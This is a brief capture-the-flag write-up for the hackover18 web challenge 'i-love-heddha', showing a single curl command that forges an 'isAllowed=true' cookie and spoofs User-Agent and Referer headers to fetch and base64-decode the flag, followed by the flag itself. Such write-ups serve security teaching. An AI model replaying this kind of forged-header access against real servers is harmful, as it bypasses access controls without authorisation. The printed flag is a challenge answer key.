*([Original write-up](https://security.meta.stackexchange.com/a/3083/95381) by [@rawsec](https://twitter.com/rawsec/))*

## i-love-heddha (web, 100)

A skiddo-friendly continuation of *ez web* that features some extra headers and `base64`.

$ curl -s --cookie "isAllowed=true" \
--header "User-Agent: Builder browser 1.0.1" \
--header "Referer: hackover.18" http://207.154.226.40:8080/flag/flag.txt \
| base64 -d

hackover18{4ngryW3bS3rv3rS4ysN0}